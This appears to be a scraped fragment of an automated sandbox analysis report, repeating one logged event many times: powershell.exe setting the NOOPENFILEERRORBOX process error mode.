                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
